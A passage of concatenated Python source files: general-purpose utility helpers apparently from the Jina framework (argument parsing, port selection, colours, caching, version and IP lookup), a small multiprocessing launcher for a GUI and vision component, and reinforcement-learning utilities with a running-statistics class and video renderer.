yield data[_ : _ + batch_size]
elif isinstance(data, Iterable):
# as iterator, there is no way to know the length of it
iterator = iter(data)
while True:
chunk = tuple(islice(iterator, batch_size))
if not chunk:
return
yield chunk
else:
raise TypeError(f'unsupported type: {type(data)}')
def parse_arg(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Parse the arguments from string to `Union[bool, int, str, list, float]`.
:param v: The string of arguments
:return: The parsed arguments list.
"""
m = re.match(r'^[\'"](.*)[\'"]$', v)
if m:
return m.group(1)
if v.startswith('[') and v.endswith(']'):
# function args must be immutable tuples not list
tmp = v.replace('[', '').replace(']', '').strip().split(',')
if len(tmp) > 0:
return [parse_arg(vv.strip()) for vv in tmp]
else:
return []
try:
v = int(v) # parse int parameter
except ValueError:
try:
v = float(v) # parse float parameter
except ValueError:
if len(v) == 0:
# ignore it when the parameter is empty
v = None
elif v.lower() == 'true': # parse boolean parameter
v = True
elif v.lower() == 'false':
v = False
return v
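# A hedged usage sketch of parse_arg (inputs are illustrative):
#   parse_arg('3')        -> 3           (int)
#   parse_arg('3.14')     -> 3.14        (float)
#   parse_arg('true')     -> True        (bool)
#   parse_arg('[1, 2]')   -> [1, 2]      (list, parsed element-wise)
#   parse_arg('"hello"')  -> 'hello'     (surrounding quotes stripped)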
def countdown(t: int, reason: str = 'I am blocking this thread') -> None:
"""
Display the countdown in console.
For example:
.. highlight:: python
.. code-block:: python
countdown(10, reason=colored('re-fetch access token', 'cyan', attrs=['bold', 'reverse']))
:param t: Countdown time.
:param reason: A string message of reason for this Countdown.
"""
try:
sys.stdout.write('\n')
sys.stdout.flush()
while t > 0:
t -= 1
msg = f'⏳ {colored("%3d" % t, "yellow")}s left: {reason}'
sys.stdout.write(f'\r{msg}')
sys.stdout.flush()
time.sleep(1)
sys.stdout.write('\n')
sys.stdout.flush()
except KeyboardInterrupt:
sys.stdout.write('no more patience? good bye!')
_random_names = (
(
'first',
'great',
'local',
'small',
'right',
'large',
'young',
'early',
'major',
'clear',
'black',
'whole',
'third',
'white',
'short',
'human',
'royal',
'wrong',
'legal',
'final',
'close',
'total',
'prime',
'happy',
'sorry',
'basic',
'aware',
'ready',
'green',
'heavy',
'extra',
'civil',
'chief',
'usual',
'front',
'fresh',
'joint',
'alone',
'rural',
'light',
'equal',
'quiet',
'quick',
'daily',
'urban',
'upper',
'moral',
'vital',
'empty',
'brief',
),
(
'world',
'house',
'place',
'group',
'party',
'money',
'point',
'state',
'night',
'water',
'thing',
'order',
'power',
'court',
'level',
'child',
'south',
'staff',
'woman',
'north',
'sense',
'death',
'range',
'table',
'trade',
'study',
'other',
'price',
'class',
'union',
'value',
'paper',
'right',
'voice',
'stage',
'light',
'march',
'board',
'month',
'music',
'field',
'award',
'issue',
'basis',
'front',
'heart',
'force',
'model',
'space',
'peter',
),
)
def random_name() -> str:
"""
Generate a random name from list.
:return: A Random name.
"""
return '_'.join(random.choice(_random_names[j]) for j in range(2))
assigned_ports = set()
def random_port() -> Optional[int]:
"""
Get a random available port number from '49153' to '65535'.
:return: A random port.
"""
import threading
import multiprocessing
from contextlib import closing
import socket
def _get_port(port=0):
with multiprocessing.Lock():
with threading.Lock():
if port not in assigned_ports:
with closing(
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
) as s:
try:
s.bind(('', port))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
except OSError:
pass
else:
return None
_port = None
if 'JINA_RANDOM_PORT_MIN' in os.environ or 'JINA_RANDOM_PORT_MAX' in os.environ:
min_port = int(os.environ.get('JINA_RANDOM_PORT_MIN', '49153'))
max_port = int(os.environ.get('JINA_RANDOM_PORT_MAX', '65535'))
all_ports = list(range(min_port, max_port + 1))
random.shuffle(all_ports)
for _port in all_ports:
if _get_port(_port) is not None:
break
else:
raise OSError(
f'can not find an available port between [{min_port}, {max_port}].'
)
else:
_port = _get_port()
assigned_ports.add(int(_port))
return int(_port)
def random_identity(use_uuid1: bool = False) -> str:
"""
Generate random UUID.
    .. note::
        A MAC address or time-based ordering (UUID1) can afford increased database performance, since it's less work
        to sort numbers that are close together than those distributed randomly (UUID4).
        A second related issue is that using UUID1 can be useful in debugging, even if origin data is lost or not
explicitly stored.
:param use_uuid1: use UUID1 instead of UUID4. This is the default Document ID generator.
:return: A random UUID.
"""
return random_uuid(use_uuid1).hex
def random_uuid(use_uuid1: bool = False) -> uuid.UUID:
"""
Get a random UUID.
:param use_uuid1: Use UUID1 if True, else use UUID4.
:return: A random UUID.
"""
return uuid.uuid1() if use_uuid1 else uuid.uuid4()
def expand_env_var(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Expand the environment variables.
:param v: String of environment variables.
:return: Parsed environment variables.
"""
if isinstance(v, str):
return parse_arg(os.path.expandvars(v))
else:
return v
def expand_dict(
d: Dict, expand_fn=expand_env_var, resolve_cycle_ref=True
) -> Dict[str, Any]:
"""
Expand variables from YAML file.
:param d: Target Dict.
:param expand_fn: Parsed environment variables.
:param resolve_cycle_ref: Defines if cyclic references should be resolved.
:return: Expanded variables.
"""
expand_map = SimpleNamespace()
pat = re.compile(r'{.+}|\$[a-zA-Z0-9_]*\b')
def _scan(sub_d: Union[Dict, List], p):
if isinstance(sub_d, dict):
for k, v in sub_d.items():
if isinstance(v, dict):
p.__dict__[k] = SimpleNamespace()
_scan(v, p.__dict__[k])
elif isinstance(v, list):
p.__dict__[k] = list()
_scan(v, p.__dict__[k])
else:
p.__dict__[k] = v
elif isinstance(sub_d, list):
for idx, v in enumerate(sub_d):
if isinstance(v, dict):
p.append(SimpleNamespace())
_scan(v, p[idx])
elif isinstance(v, list):
p.append(list())
_scan(v, p[idx])
else:
p.append(v)
def _replace(sub_d: Union[Dict, List], p):
if isinstance(sub_d, Dict):
for k, v in sub_d.items():
if isinstance(v, (dict, list)):
_replace(v, p.__dict__[k])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[k] = _sub(v, p)
elif isinstance(sub_d, List):
for idx, v in enumerate(sub_d):
if isinstance(v, (dict, list)):
_replace(v, p[idx])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[idx] = _sub(v, p)
def _sub(v, p):
if resolve_cycle_ref:
try:
v = v.format(root=expand_map, this=p)
except KeyError:
pass
return expand_fn(v)
_scan(d, expand_map)
_replace(d, expand_map)
return d
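# A minimal usage sketch (hedged; the dict and environment variable below are hypothetical):
#
#     os.environ['MY_DATA_ROOT'] = '/data'
#     cfg = {'root_dir': '${MY_DATA_ROOT}', 'index_dir': '{root.root_dir}/index'}
#     expand_dict(cfg)
#     # -> {'root_dir': '/data', 'index_dir': '/data/index'}
#
# Environment variables are expanded via `expand_fn` (default `expand_env_var`), and
# `{root.<key>}` / `{this.<key>}` placeholders are resolved against the raw (pre-expansion)
# values of the same dict, with the result expanded again.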
_ATTRIBUTES = {
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8,
}
_HIGHLIGHTS = {
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47,
}
_COLORS = {
'black': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37,
}
_RESET = '\033[0m'
if __windows__:
os.system('color')
def colored(
text: str,
color: Optional[str] = None,
on_color: Optional[str] = None,
attrs: Optional[Union[str, list]] = None,
) -> str:
"""
Give the text with color.
:param text: The target text.
:param color: The color of text. Chosen from the following.
{
'grey': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37
}
:param on_color: The on_color of text. Chosen from the following.
{
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47
}
:param attrs: Attributes of color. Chosen from the following.
{
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8
}
:return: Colored text.
"""
if 'JINA_LOG_NO_COLOR' not in os.environ:
fmt_str = '\033[%dm%s'
if color:
text = fmt_str % (_COLORS[color], text)
if on_color:
text = fmt_str % (_HIGHLIGHTS[on_color], text)
if attrs:
if isinstance(attrs, str):
attrs = [attrs]
if isinstance(attrs, list):
for attr in attrs:
text = fmt_str % (_ATTRIBUTES[attr], text)
text += _RESET
return text
class ColorContext:
def __init__(self, color: str, bold: Optional[bool] = False):
self._color = color
self._bold = bold
def __enter__(self):
if self._bold:
fmt_str = '\033[1;%dm'
else:
fmt_str = '\033[0;%dm'
c = fmt_str % (_COLORS[self._color])
print(c, flush=True, end='')
return self
def __exit__(self, typ, value, traceback):
print(_RESET, flush=True, end='')
def warn_unknown_args(unknown_args: List[str]):
"""Creates warnings for all given arguments.
:param unknown_args: arguments that are possibly unknown to Jina
"""
from cli.lookup import _build_lookup_table
all_args = _build_lookup_table()[0]
has_migration_tip = False
real_unknown_args = []
warn_strs = []
for arg in unknown_args:
if arg.replace('--', '') not in all_args:
from jina.parsers.deprecated import get_deprecated_replacement
new_arg = get_deprecated_replacement(arg)
if new_arg:
if not has_migration_tip:
warn_strs.append('Migration tips:')
has_migration_tip = True
warn_strs.append(f'\t`{arg}` has been renamed to `{new_arg}`')
real_unknown_args.append(arg)
if real_unknown_args:
warn_strs = [f'ignored unknown argument: {real_unknown_args}.'] + warn_strs
warnings.warn(''.join(warn_strs))
class ArgNamespace:
"""Helper function for argparse.Namespace object."""
@staticmethod
def kwargs2list(kwargs: Dict) -> List[str]:
"""
Convert dict to an argparse-friendly list.
:param kwargs: dictionary of key-values to be converted
:return: argument list
"""
args = []
from jina.executors import BaseExecutor
for k, v in kwargs.items():
k = k.replace('_', '-')
if v is not None:
if isinstance(v, bool):
if v:
args.append(f'--{k}')
elif isinstance(v, list): # for nargs
args.extend([f'--{k}', *(str(vv) for vv in v)])
elif isinstance(v, dict):
args.extend([f'--{k}', json.dumps(v)])
elif isinstance(v, type) and issubclass(v, BaseExecutor):
args.extend([f'--{k}', v.__name__])
else:
args.extend([f'--{k}', str(v)])
return args
@staticmethod
def kwargs2namespace(
kwargs: Dict[str, Union[str, int, bool]],
parser: ArgumentParser,
warn_unknown: bool = False,
fallback_parsers: Optional[List[ArgumentParser]] = None,
positional_args: Optional[Tuple[str, ...]] = None,
) -> Namespace:
"""
Convert dict to a namespace.
:param kwargs: dictionary of key-values to be converted
:param parser: the parser for building kwargs into a namespace
:param warn_unknown: True, if unknown arguments should be logged
:param fallback_parsers: a list of parsers to help resolving the args
:param positional_args: some parser requires positional arguments to be presented
:return: argument list
"""
args = ArgNamespace.kwargs2list(kwargs)
if positional_args:
args += positional_args
p_args, unknown_args = parser.parse_known_args(args)
if warn_unknown and unknown_args:
_leftovers = set(unknown_args)
if fallback_parsers:
for p in fallback_parsers:
_, _unk_args = p.parse_known_args(args)
_leftovers = _leftovers.intersection(_unk_args)
if not _leftovers:
# all args have been resolved
break
warn_unknown_args(_leftovers)
return p_args
@staticmethod
def get_non_defaults_args(
args: Namespace, parser: ArgumentParser, taboo: Optional[Set[str]] = None
) -> Dict:
"""
Get non-default args in a dict.
:param args: the namespace to parse
:param parser: the parser for referring the default values
:param taboo: exclude keys in the final result
:return: non defaults
"""
if taboo is None:
taboo = set()
non_defaults = {}
_defaults = vars(parser.parse_args([]))
for k, v in vars(args).items():
if k in _defaults and k not in taboo and _defaults[k] != v:
non_defaults[k] = v
return non_defaults
@staticmethod
def flatten_to_dict(
args: Union[Dict[str, 'Namespace'], 'Namespace']
) -> Dict[str, Any]:
"""Convert argparse.Namespace to dict to be uploaded via REST.
        :param args: a namespace, or a dict whose values are namespaces or lists of namespaces
:return: pea args
"""
if isinstance(args, Namespace):
return vars(args)
elif isinstance(args, dict):
pea_args = {}
for k, v in args.items():
if isinstance(v, Namespace):
pea_args[k] = vars(v)
elif isinstance(v, list):
pea_args[k] = [vars(_) for _ in v]
else:
pea_args[k] = v
return pea_args
def is_valid_local_config_source(path: str) -> bool:
# TODO: this function must be refactored before 1.0 (Han 12.22)
"""
Check if the path is valid.
:param path: Local file path.
:return: True if the path is valid else False.
"""
try:
from jina.jaml import parse_config_source
parse_config_source(path)
return True
except FileNotFoundError:
return False
def get_full_version() -> Optional[Tuple[Dict, Dict]]:
"""
Get the version of libraries used in Jina and environment variables.
:return: Version information and environment variables
"""
import os, grpc, google.protobuf, yaml, platform
from jina import (
__version__,
__proto_version__,
__docarray_version__,
__jina_env__,
__uptime__,
__unset_msg__,
)
from google.protobuf.internal import api_implementation
from grpc import _grpcio_metadata
from jina.logging.predefined import default_logger
from uuid import getnode
try:
info = {
'jina': __version__,
'docarray': __docarray_version__,
'jina-proto': __proto_version__,
'jina-vcs-tag': os.environ.get('JINA_VCS_VERSION', __unset_msg__),
'protobuf': google.protobuf.__version__,
'proto-backend': api_implementation._default_implementation_type,
'grpcio': getattr(grpc, '__version__', _grpcio_metadata.__version__),
'pyyaml': yaml.__version__,
'python': platform.python_version(),
'platform': platform.system(),
'platform-release': platform.release(),
'platform-version': platform.version(),
'architecture': platform.machine(),
'processor': platform.processor(),
'uid': getnode(),
'session-id': str(random_uuid(use_uuid1=True)),
'uptime': __uptime__,
'ci-vendor': get_ci_vendor() or __unset_msg__,
}
env_info = {k: os.getenv(k, __unset_msg__) for k in __jina_env__}
full_version = info, env_info
except Exception as e:
default_logger.error(str(e))
full_version = None
return full_version
def format_full_version_info(info: Dict, env_info: Dict) -> str:
"""
Format the version information.
:param info: Version information of Jina libraries.
:param env_info: The Jina environment variables.
:return: Formatted version information.
"""
version_info = '\n'.join(f'- {k:30s}{v}' for k, v in info.items())
env_info = '\n'.join(f'* {k:30s}{v}' for k, v in env_info.items())
return version_info + '\n' + env_info
def _update_policy():
if __windows__:
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
elif 'JINA_DISABLE_UVLOOP' in os.environ:
return
else:
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ModuleNotFoundError:
warnings.warn(
'Install `uvloop` via `pip install "jina[uvloop]"` for better performance.'
)
def get_or_reuse_loop():
"""
Get a new eventloop or reuse the current opened eventloop.
:return: A new eventloop or reuse the current opened eventloop.
"""
try:
loop = asyncio.get_running_loop()
if loop.is_closed():
raise RuntimeError
except RuntimeError:
_update_policy()
# no running event loop
# create a new loop
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop
def typename(obj):
"""
Get the typename of object.
:param obj: Target object.
:return: Typename of the obj.
"""
if not isinstance(obj, type):
obj = obj.__class__
try:
return f'{obj.__module__}.{obj.__name__}'
except AttributeError:
return str(obj)
class CatchAllCleanupContextManager:
"""
This context manager guarantees, that the :method:``__exit__`` of the
sub context is called, even when there is an Exception in the
:method:``__enter__``.
:param sub_context: The context, that should be taken care of.
"""
def __init__(self, sub_context):
self.sub_context = sub_context
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type:
self.sub_context.__exit__(exc_type, exc_val, exc_tb)
class cached_property:
"""The decorator to cache property of a class."""
def __init__(self, func):
"""
Create the :class:`cached_property`.
:param func: Cached function.
"""
self.func = func
def __get__(self, obj, cls):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
return cached_value
value = obj.__dict__[f'CACHED_{self.func.__name__}'] = self.func(obj)
return value
def __delete__(self, obj):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
if hasattr(cached_value, 'close'):
cached_value.close()
del obj.__dict__[f'CACHED_{self.func.__name__}']
class _cache_invalidate:
"""Class for cache invalidation, remove strategy.
:param func: func to wrap as a decorator.
:param attribute: String as the function name to invalidate cached
data. E.g. in :class:`cached_property` we cache data inside the class obj
with the `key`: `CACHED_{func.__name__}`, the func name in `cached_property`
is the name to invalidate.
"""
def __init__(self, func, attribute: str):
self.func = func
self.attribute = attribute
def __call__(self, *args, **kwargs):
obj = args[0]
cached_key = f'CACHED_{self.attribute}'
if cached_key in obj.__dict__:
del obj.__dict__[cached_key] # invalidate
self.func(*args, **kwargs)
def __get__(self, obj, cls):
from functools import partial
return partial(self.__call__, obj)
def cache_invalidate(attribute: str):
"""The cache invalidator decorator to wrap the method call.
Check the implementation in :class:`_cache_invalidate`.
:param attribute: The func name as was stored in the obj to invalidate.
:return: wrapped method.
"""
def _wrap(func):
return _cache_invalidate(func, attribute)
return _wrap
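# A hedged usage sketch (the class below is hypothetical, not part of Jina): pairing
# `cached_property` with `cache_invalidate` so that mutating the data clears the cache.
#
#     class _Store:
#         def __init__(self):
#             self._items = []
#
#         @cached_property
#         def summary(self):
#             return len(self._items)   # cached under obj.__dict__['CACHED_summary']
#
#         @cache_invalidate(attribute='summary')
#         def add(self, item):
#             self._items.append(item)  # 'CACHED_summary' is deleted before this runs
#
# After `store.add(x)`, the next access to `store.summary` recomputes the value.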
def get_now_timestamp():
"""
Get the datetime.
:return: The datetime in int format.
"""
now = datetime.now()
return int(datetime.timestamp(now))
def get_readable_time(*args, **kwargs):
"""
Get the datetime in human readable format (e.g. 115 days and 17 hours and 46 minutes and 40 seconds).
For example:
.. highlight:: python
.. code-block:: python
get_readable_time(seconds=1000)
:param args: arguments for datetime.timedelta
:param kwargs: key word arguments for datetime.timedelta
:return: Datetime in human readable format.
"""
import datetime
secs = float(datetime.timedelta(*args, **kwargs).total_seconds())
units = [('day', 86400), ('hour', 3600), ('minute', 60), ('second', 1)]
parts = []
for unit, mul in units:
if secs / mul >= 1 or mul == 1:
if mul > 1:
n = int(math.floor(secs / mul))
secs -= n * mul
else:
n = int(secs)
parts.append(f'{n} {unit}' + ('' if n == 1 else 's'))
return ' and '.join(parts)
def get_internal_ip():
"""
Return the private IP address of the gateway for connecting from other machine in the same network.
:return: Private IP address.
"""
import socket
ip = '127.0.0.1'
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
pass
return ip
def get_public_ip(timeout: float = 0.3):
"""
Return the public IP address of the gateway for connecting from other machine in the public network.
:param timeout: the seconds to wait until return None.
:return: Public IP address.
    .. warning::
        Setting `timeout` to a large number will block the Flow.
"""
import urllib.request
results = []
def _get_ip(url):
try:
req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
with urllib.request.urlopen(req, timeout=timeout) as fp:
_ip = fp.read().decode().strip()
results.append(_ip)
except:
            pass  # intentionally ignored, public ip is not shown
ip_server_list = [
'https://api.ipify.org',
'https://ident.me',
'https://checkip.amazonaws.com/',
]
threads = []
for idx, ip in enumerate(ip_server_list):
t = threading.Thread(target=_get_ip, args=(ip,))
threads.append(t)
t.start()
for t in threads:
t.join(timeout)
for r in results:
if r:
return r
def convert_tuple_to_list(d: Dict):
"""
Convert all the tuple type values from a dict to list.
:param d: Dict type of data.
"""
for k, v in d.items():
if isinstance(v, tuple):
d[k] = list(v)
elif isinstance(v, dict):
convert_tuple_to_list(v)
def is_jupyter() -> bool: # pragma: no cover
"""
    Check if we're running in a Jupyter notebook, using the `get_ipython` magic that is only available in IPython/Jupyter.
:return: True if run in a Jupyter notebook else False.
"""
try:
get_ipython # noqa: F821
except NameError:
return False
shell = get_ipython().__class__.__name__ # noqa: F821
if shell == 'ZMQInteractiveShell':
return True # Jupyter notebook or qtconsole
elif shell == 'Shell':
return True # Google colab
elif shell == 'TerminalInteractiveShell':
return False # Terminal running IPython
else:
return False # Other type (?)
def iscoroutinefunction(func: Callable):
return inspect.iscoroutinefunction(func)
async def run_in_threadpool(func: Callable, executor=None, *args, **kwargs):
return await get_or_reuse_loop().run_in_executor(
executor, functools.partial(func, *args, **kwargs)
)
def run_async(func, *args, **kwargs):
"""Generalized asyncio.run for jupyter notebook.
    When running inside Jupyter, an event loop already exists and cannot be stopped or killed.
    Directly calling asyncio.run will fail, because that function cannot be called when another
    asyncio event loop is running in the same thread.
.. see_also:
https://stackoverflow.com/questions/55409641/asyncio-run-cannot-be-called-from-a-running-event-loop
call `run_async(my_function, any_event_loop=True, *args, **kwargs)` to enable run with any eventloop
:param func: function to run
:param args: parameters
:param kwargs: key-value parameters
:return: asyncio.run(func)
"""
any_event_loop = kwargs.pop('any_event_loop', False)
class _RunThread(threading.Thread):
"""Create a running thread when in Jupyter notebook."""
def run(self):
"""Run given `func` asynchronously."""
self.result = asyncio.run(func(*args, **kwargs))
try:
loop = asyncio.get_running_loop()
except RuntimeError:
loop = None
if loop and loop.is_running():
# eventloop already exist
# running inside Jupyter
if any_event_loop or is_jupyter():
thread = _RunThread()
thread.start()
thread.join()
try:
return thread.result
except AttributeError:
from jina.excepts import BadClient
raise BadClient(
'something wrong when running the eventloop, result can not be retrieved'
)
else:
raise RuntimeError(
'you have an eventloop running but not using Jupyter/ipython, '
'this may mean you are using Jina with other integration? if so, then you '
'may want to use Client/Flow(asyncio=True). If not, then '
'please report this issue here: https://github.com/jina-ai/jina'
)
else:
return get_or_reuse_loop().run_until_complete(func(*args, **kwargs))
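# A hedged usage sketch (the coroutine below is hypothetical): run a coroutine from
# synchronous code whether or not an event loop is already running (e.g. in Jupyter).
#
#     async def _double(x):
#         return x * 2
#
#     result = run_async(_double, 21)  # -> 42 in plain scripts and notebooks alike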
def slugify(value):
"""
    Normalize the string: strip it, replace spaces with underscores and drop characters that are not alphanumerics, underscores, hyphens or dots.
:param value: Original string.
:return: Processed string.
"""
s = str(value).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
def is_yaml_filepath(val) -> bool:
"""
Check if the file is YAML file.
:param val: Path of target file.
:return: True if the file is YAML else False.
"""
if __windows__:
r = r'.*.ya?ml$' # TODO: might not be exhaustive
else:
r = r'^[/\w\-\_\.]+.ya?ml$'
return re.match(r, val.strip()) is not None
def download_mermaid_url(mermaid_url, output) -> None:
"""
Download the jpg image from mermaid_url.
:param mermaid_url: The URL of the image.
:param output: A filename specifying the name of the image to be created, the suffix svg/jpg determines the file type of the output image.
"""
from urllib.request import Request, urlopen
try:
req = Request(mermaid_url, headers={'User-Agent': 'Mozilla/5.0'})
with open(output, 'wb') as fp:
fp.write(urlopen(req).read())
except:
from jina.logging.predefined import default_logger
default_logger.error(
'can not download image, please check your graph and the network connections'
)
def find_request_binding(target):
"""Find `@request` decorated methods in a class.
:param target: the target class to check
:return: a dictionary with key as request type and value as method name
"""
import ast, inspect
from jina import __default_endpoint__
res = {}
def visit_function_def(node):
for e in node.decorator_list:
req_name = ''
if isinstance(e, ast.Call) and e.func.id == 'requests':
req_name = e.keywords[0].value.s
elif isinstance(e, ast.Name) and e.id == 'requests':
req_name = __default_endpoint__
if req_name:
if req_name in res:
raise ValueError(
f'you already bind `{res[req_name]}` with `{req_name}` request'
)
else:
res[req_name] = node.name
V = ast.NodeVisitor()
V.visit_FunctionDef = visit_function_def
V.visit(compile(inspect.getsource(target), '?', 'exec', ast.PyCF_ONLY_AST))
return res
def dunder_get(_dict: Any, key: str) -> Any:
"""Returns value for a specified dunderkey
A "dunderkey" is just a fieldname that may or may not contain
double underscores (dunderscores!) for referencing nested keys in
a dict. eg::
>>> data = {'a': {'b': 1}}
>>> dunder_get(data, 'a__b')
1
    key 'b' can be referenced as 'a__b'
:param _dict : (dict, list, struct or object) which we want to index into
:param key : (str) that represents a first level or nested key in the dict
:return: (mixed) value corresponding to the key
"""
try:
part1, part2 = key.split('__', 1)
except ValueError:
part1, part2 = key, ''
try:
part1 = int(part1) # parse int parameter
except ValueError:
pass
from google.protobuf.struct_pb2 import ListValue
from google.protobuf.struct_pb2 import Struct
if isinstance(part1, int):
result = _dict[part1]
elif isinstance(_dict, (dict, Struct, MutableMapping)):
if part1 in _dict:
result = _dict[part1]
else:
result = None
elif isinstance(_dict, (Iterable, ListValue)):
result = _dict[part1]
else:
result = getattr(_dict, part1)
return dunder_get(result, part2) if part2 else result
if TYPE_CHECKING:
from fastapi import FastAPI
def extend_rest_interface(app: 'FastAPI') -> 'FastAPI':
"""Extend Jina built-in FastAPI instance with customized APIs, routing, etc.
:param app: the built-in FastAPI instance given by Jina
:return: the extended FastAPI instance
.. highlight:: python
.. code-block:: python
def extend_rest_interface(app: 'FastAPI'):
@app.get('/extension1')
async def root():
return {"message": "Hello World"}
return app
"""
return app
def get_ci_vendor() -> Optional[str]:
from jina import __resources_path__
with open(os.path.join(__resources_path__, 'ci-vendors.json')) as fp:
all_cis = json.load(fp)
for c in all_cis:
if isinstance(c['env'], str) and c['env'] in os.environ:
return c['constant']
elif isinstance(c['env'], dict):
for k, v in c['env'].items():
if os.environ.get(k, None) == v:
return c['constant']
elif isinstance(c['env'], list):
for k in c['env']:
if k in os.environ:
return c['constant']
def deprecate_by(new_fn):
def _f(*args, **kwargs):
import inspect
old_fn_name = inspect.stack()[1][4][0].strip().split("=")[0].strip()
warnings.warn(
f'`{old_fn_name}` is renamed to `{new_fn.__name__}` with the same usage, please use the latter instead. '
f'The old function will be removed soon.',
DeprecationWarning,
)
return new_fn(*args, **kwargs)
return _f
def get_request_header() -> Dict:
"""Return the header of request.
:return: request header
"""
metas, envs = get_full_version()
header = {
**{f'jinameta-{k}': str(v) for k, v in metas.items()},
**envs,
}
return header
|
main.py
|
from multiprocessing import Process, Pipe
import integration
import cv
if __name__ == '__main__':
# Creating pipes to send data between two processes
parent_conn, child_conn = Pipe()
# GUI component receives data
p1 = Process(target=integration.main, args=(parent_conn,))
# CV component sends data
p2 = Process(target=cv.main, args=(child_conn,))
    # Sets up both the computer vision component and the GUI window to run on the Pi.
p1.start()
p2.start()
p1.join()
p2.join()
|
utils.py
|
import queue
import random
import socket
import time
from multiprocessing import Process
import gym
import numpy as np
import pyglet
from a2c.common.atari_wrappers import wrap_deepmind
from scipy.ndimage import zoom
# https://github.com/joschu/modular_rl/blob/master/modular_rl/running_stat.py
# http://www.johndcook.com/blog/standard_deviation/
class RunningStat(object):
def __init__(self, shape=()):
self._n = 0
self._M = np.zeros(shape)
self._S = np.zeros(shape)
def push(self, x):
x = np.asarray(x)
assert x.shape == self._M.shape
self._n += 1
if self._n == 1:
self._M[...] = x
else:
oldM = self._M.copy()
self._M[...] = oldM + (x - oldM)/self._n
self._S[...] = self._S + (x - oldM)*(x - self._M)
@property
def n(self):
return self._n
@property
def mean(self):
return self._M
@property
def var(self):
if self._n >= 2:
return self._S/(self._n - 1)
else:
return np.square(self._M)
@property
def std(self):
return np.sqrt(self.var)
@property
def shape(self):
return self._M.shape
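# A hedged usage sketch (values are illustrative): track mean/std of observations
# incrementally without storing them all.
#
#     rs = RunningStat(shape=(2,))
#     for x in ([1.0, 2.0], [3.0, 4.0], [5.0, 6.0]):
#         rs.push(x)
#     rs.mean  # -> array([3., 4.])
#     rs.std   # -> array([2., 2.])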
# Based on SimpleImageViewer in OpenAI gym
class Im(object):
def __init__(self, display=None):
self.window = None
self.isopen = False
self.display = display
def imshow(self, arr):
if self.window is None:
height, width = arr.shape
self.window = pyglet.window.Window(
width=width, height=height, display=self.display)
self.width = width
self.height = height
self.isopen = True
assert arr.shape == (self.height, self.width), \
"You passed in an image with the wrong number shape"
image = pyglet.image.ImageData(self.width, self.height,
'L', arr.tobytes(), pitch=-self.width)
self.window.clear()
self.window.switch_to()
self.window.dispatch_events()
image.blit(0, 0)
self.window.flip()
def close(self):
if self.isopen:
self.window.close()
self.isopen = False
def __del__(self):
self.close()
class VideoRenderer:
play_through_mode = 0
restart_on_get_mode = 1
def __init__(self, vid_queue, mode, zoom=1, playback_speed=1):
assert mode == VideoRenderer.restart_on_get_mode or mode == VideoRenderer.play_through_mode
self.mode = mode
self.vid_queue = vid_queue
self.zoom_factor = zoom
self.playback_speed = playback_speed
self.proc = Process(target=self.render)
self.proc.start()
def stop(self):
self.proc.terminate()
def render(self):
v = Im()
frames = self.vid_queue.get(block=True)
t = 0
while True:
# Add a grey dot on the last line showing position
width = frames[t].shape[1]
fraction_played = t / len(frames)
x = int(fraction_played * width)
frames[t][-1][x] = 128
zoomed_frame = zoom(frames[t], self.zoom_factor)
v.imshow(zoomed_frame)
if self.mode == VideoRenderer.play_through_mode:
# Finish playing through the current set of frames,
# then fetch the most recent set of frames from the
# queue and start again.
t += self.playback_speed
if t >= len(frames):
frames = self.get_queue_most_recent()
t = 0
else:
time.sleep(1/60)
elif self.mode == VideoRenderer.restart_on_get_mode:
# Always try and get a new set of frames to show.
# If there is a new set of frames on the queue,
# restart playback with those frames immediately.
# Otherwise, just keep looping with the current frames.
try:
frames = self.vid_queue.get(block=False)
t = 0
except queue.Empty:
t = (t + self.playback_speed) % len(frames)
time.sleep(1/60)
def get_queue_most_recent(self):
# Make sure we at least get something
item = self.vid_queue.get(block=True)
while True:
try:
item = self.vid_queue.get(block=True, timeout=0.1)
except queue.Empty:
break
return item
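# Usage sketch (illustrative; assumes a display is available for pyglet):
#
#   from multiprocessing import Queue
#   q = Queue()
#   renderer = VideoRenderer(q, mode=VideoRenderer.restart_on_get_mode, zoom=4)
#   q.put(frames)        # frames: list of 2-D grayscale (uint8) arrays
#   ...
#   renderer.stop()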
def get_port_range(start_port, n_ports, random_stagger=False):
# If multiple runs call this function at the same time,
# the function could return the same port range.
# To guard against this, optionally stagger the starting port at random.
if random_stagger:
start_port += random.randint(0, 20) * n_ports
free_range_found = False
while not free_range_found:
ports = []
for port_n in range(n_ports):
port = start_port + port_n
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("127.0.0.1", port))
ports.append(port)
except socket.error as e:
if e.errno == 98 or e.errno == 48:
print("Warning: port {} already in use".format(port))
break
else:
raise e
finally:
s.close()
if len(ports) < n_ports:
# The last port we tried was in use
